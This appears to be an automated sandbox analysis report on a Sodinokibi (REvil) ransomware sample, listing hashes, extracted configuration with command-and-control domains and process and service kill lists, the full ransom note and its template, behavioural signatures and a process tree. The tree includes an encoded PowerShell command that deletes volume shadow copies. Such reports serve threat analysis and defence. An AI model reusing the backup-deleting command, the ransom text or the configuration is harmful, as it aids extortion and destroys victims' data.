Analysis

  • max time kernel
    151s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:04

General

  • Target

    c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe

  • Size

    247KB

  • MD5

    04d97184729b092f1d795778caec8927

  • SHA1

    ee0a24536a64ed0803502501d6d6a1e336213063

  • SHA256

    c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251

  • SHA512

    c7cc2ec811f73c8b844281d689bfad03c89df321478e2cf2b4c3f0b46371bebf430349f1bfd8572d2588681189344b5b90e8a8b168ac3ac7c0d84521db1b23ec

Malware Config

Extracted

Path

C:\96u871fz-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 96u871fz. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/349C731D2845E903 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/349C731D2845E903 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: ASf1Q1dh94sz0k+kW0fy6v5KZV8UUPtagk4znL1yBbfhn4AmI17CxF6XAuL/cB0l PBDmsx0nDwND5gvlBh+qvDVR3MoIz4ps+1EGnbZrH+NkBpM6IfnBTutxrJ43nMD2 3amIyPydHu5Z7WVr69sn7lg3O1scKNnco7uOujnv9etlHL89XR52cJfZV4Iv+g7T y0oT2MOdrTgndoG7EluhsnTGbtVlx4itXoCmbIBby4R/B00HU7cUOe8IB68y/xIV iuGAf+E1UKKLApXDWyQ0nNdUz1MtQo/Jf1yq3sYYyvMBRnPLKZKuUKzcO6DQjKjA x3929jbp3CdaXZStNxT5JXP93HlbhJlyODbtEevYQ+s9wuQBRqf+ktEQGHcJI1TB EooFICZO5YXaqMl96e8mn+O3oVgk141lSA+dq43VbiDZW3krxmP8eE/W3MLPY70H LbtWiYSyzNdtPpSn2jc2awVAYqZsgfdNLdcyS4rIiaBkfp9q2g7fmXtfxZLOG1dP AZwf8rXCArWeBIhpxptiRdA9v1AQVIVA7Dx4e5qMtSESdthPEp9ciJLQSSPm0uei 2iFD3M2EGw3LrPwb50hynGNBPB9InJPTcUzi9IY3+moWZBSJxOwCSkFr6TggSEI2 +lXMI6G17c3HQRC0s5kV2WSxbuuV8J7FeITz6kDPpclIULh0OwahII8FQzjLNKQq /XE6QyLicozf10j9sqCo/b1qEua/AONk/LS88iP/rcIRZlWAyagwe9EH5lDenOgx 7vyv0lPNpZhoTpZJnGPIpxoKOIJSkj8EIpYpDf/eeKFUXr9QY2FRH91+qc7Nf5bv anvs5Hulhnvm/U1m0KLaDbe3nsvTJZ0SjuC1t2rJqOwF1+yfoJVbFyhYSAOvRGwe O3KYwByXtgesV5XGKP9t6JsUaUyFmpoMaAICU+77PsoejOjUPQGY+BcIyMaMdgLO q68kdPq1ufeIs7Ma2gPmLNu/P2slzOwol1iOy80uUsQKJL78iHObqZQmOy/Rwvza jQO40Wpq/ex5KahFJiEJWt+HoIkbhEbNU7yXDjvGDKmrsKxdNweA65Nup0KdYxI4 zsUh58h6xWE84Yr9ix80g8CeHJb5vukoZflcQmERjKMzdMdSWZE2J6e/ARZUSCcY iSJThRSQ2vqoqHV0H+R53LSc322d6QXC1qDhYoZCNNdY5aF7qySdfCb6iZ95YMO7 W3TXEi7AdQxUdP2gMvK2J4CV8LIvoW6fbBQPf33AkpOM9k5hn8Kd/azzoIMBDUqr Di2vT/eYg3VCHov8nVfzLXAZA474G2O8deeVCw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/349C731D2845E903

http://decryptor.cc/349C731D2845E903

Extracted

Family

sodinokibi

Botnet

$2a$10$ZGqIY89Jar0DY9/9Hnp6Ku0nKqXP6FZH6TuF1uc0S2.QEFDPiJ9LS

Campaign

2866

C2

spargel-kochen.de

bloggyboulga.net

huehnerauge-entfernen.de

ravensnesthomegoods.com

highlinesouthasc.com

delawarecorporatelaw.com

campus2day.de

gopackapp.com

lubetkinmediacompanies.com

leda-ukraine.com.ua

kaminscy.com

ecoledansemulhouse.fr

oslomf.no

southeasternacademyofprosthodontics.org

kuntokeskusrok.fi

sloverse.com

tuuliautio.fi

coffreo.biz

testcoreprohealthuk.com

ulyssemarketing.com

Attributes

  • net

    true

  • pid

    $2a$10$ZGqIY89Jar0DY9/9Hnp6Ku0nKqXP6FZH6TuF1uc0S2.QEFDPiJ9LS

  • prc

    isqlplussvc

    mydesktopqos

    ocautoupds

    thebat

    dbeng50

    firefox

    tbirdconfig

    thunderbird

    synctime

    powerpnt

    winword

    mspub

    steam

    sqbcoreservice

    encsvc

    onenote

    oracle

    visio

    dbsnmp

    agntsvc

    sql

    infopath

    xfssvccon

    msaccess

    ocssd

    wordpad

    excel

    mydesktopservice

    outlook

    ocomm

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. 
From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    2866

  • svc

    memtas

    mepocs

    svc$

    vss

    backup

    sql

    veeam

    sophos

Signatures

  • Detect Neshta Payload 3 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe
    "C:\Users\Admin\AppData\Local\Temp\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Drops startup file
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1228
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1916
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1392
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1396 -s 1192
      1⤵
      • Program crash
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:480

Network

MITRE ATT&CK Enterprise v6

Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe

      MD5

      c344cb3365d1c252ec9bca116df262c2

      SHA1

      feb6d0bbacdb99b882d563f27b78c9723f2aac49

      SHA256

      5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

      SHA512

      ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \??\c:\msocache\all users\{90140000-0011-0000-0000-0000000ff1ce}-c\ose.exe

      MD5

      8358e1747f61ad8dfc6010abbe3b2e69

      SHA1

      2f8b1cfed014fb7b354c1823a091bd0350c4842c

      SHA256

      644903941088019846b1d2e22acd69488ee2589ada9cd40a8607868e5705465f

      SHA512

      175d7372148ae71d58b05a9766a6ae7d8e97102892a47d22c5a179042d48b94888a0109d42bf5234c9f48220de72f2414ccc0391a38614af43eacd5a39b4fe69

    • \??\c:\msocache\all users\{90140000-0011-0000-0000-0000000ff1ce}-c\setup.exe

      MD5

      279fbacc1553de8c705ec0e1a33aee68

      SHA1

      9989e58854fe5627424ae590c1551f2b23c12f28

      SHA256

      e8b2f5eea122279920201fe1782536457ea8cf17f06db740f1df22cd04aadc8b

      SHA512

      ff0dc6a90b5f279156131aaf987a47c19fef30e4e590c64ac193000f8da8900bd56822ff24b683a84efabb740ba96453ffaaa771d156c2e9cd39fc115d91cb3c

    • \??\c:\msocache\all users\{90140000-0115-0409-0000-0000000ff1ce}-c\DW20.EXE

      MD5

      1f6d272728a0d02b041e8c47de259f06

      SHA1

      7888972fa1b237a3122d5e2fb980c80d5e393e9b

      SHA256

      7dfd5d5ee0616eb1bbdcea4e0c19c16ba34add0754a573a7d6df5f55446fb37a

      SHA512

      222ada8a0392c98dca9589d683adec3758334300fdfdcd02a5e30a5dda2bafeaa382cdc6cc86287219093c38d6541d5c8d291dc96352483f29c29c5fe1e27d2d

    • \??\c:\msocache\all users\{90140000-0115-0409-0000-0000000ff1ce}-c\dwtrig20.exe

      MD5

      e4eb2e445fd2e9dcd0375850f2c79899

      SHA1

      08d2277bf93ab0940ce78ea1d311d01332fb1a8b

      SHA256

      ba4972885fdfafb91d1892e244ea4b7c426fc96ef92c8de3fbd50fc6dd404e40

      SHA512

      fbed96e10fad8a92d99a3811293f9d69f90eca442443969e0147f96d8141eea9c983c0b8d5ee24dcda153e4bfbbfdc10c1318baa9a8193f1f692d3e33c058f00

    • \??\c:\users\admin\appdata\local\temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe

      MD5

      c344cb3365d1c252ec9bca116df262c2

      SHA1

      feb6d0bbacdb99b882d563f27b78c9723f2aac49

      SHA256

      5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

      SHA512

      ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

    • \??\c:\users\admin\appdata\roaming\microsoft\windows\recent\customdestinations\590aee7bdd69b59b.customDestinations-ms

      MD5

      cc7b57ca539493f36f65c8b1e0d5e8d4

      SHA1

      bd4f79c687d6bfadb12ba87b9b987afbf5bdd905

      SHA256

      df99911f7a9e4ecc700674fb682070b7c484d4036e3f047901f49f00bed1b604

      SHA512

      ec770fe3bbc077eee04f6f1cab2d849d2caecec51ccfc8eb7d08a8935fb4aafb719cdd03327fca7e409877af029b24a7ace98b59e9bd92aa8d8f4eba858792c6

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe

      MD5

      c344cb3365d1c252ec9bca116df262c2

      SHA1

      feb6d0bbacdb99b882d563f27b78c9723f2aac49

      SHA256

      5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

      SHA512

      ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

    • \Users\Admin\AppData\Local\Temp\3582-490\c9d1ef33ca6a91b13f43b764beb0fe55893d0345e6a49deefec01c8b9b9c1251.exe

      MD5

      c344cb3365d1c252ec9bca116df262c2

      SHA1

      feb6d0bbacdb99b882d563f27b78c9723f2aac49

      SHA256

      5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

      SHA512

      ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

    • memory/480-74-0x0000000001CF0000-0x0000000001CF1000-memory.dmp

      Filesize

      4KB

    • memory/1228-60-0x000007FEFC241000-0x000007FEFC243000-memory.dmp

      Filesize

      8KB

    • memory/1228-65-0x000000000204B000-0x000000000206A000-memory.dmp

      Filesize

      124KB

    • memory/1228-61-0x000007FEF34A0000-0x000007FEF3FFD000-memory.dmp

      Filesize

      11.4MB

    • memory/1228-64-0x0000000002044000-0x0000000002047000-memory.dmp

      Filesize

      12KB

    • memory/1228-63-0x0000000002042000-0x0000000002044000-memory.dmp

      Filesize

      8KB

    • memory/1228-62-0x0000000002040000-0x0000000002042000-memory.dmp

      Filesize

      8KB

    • memory/1580-55-0x00000000763B1000-0x00000000763B3000-memory.dmp

      Filesize

      8KB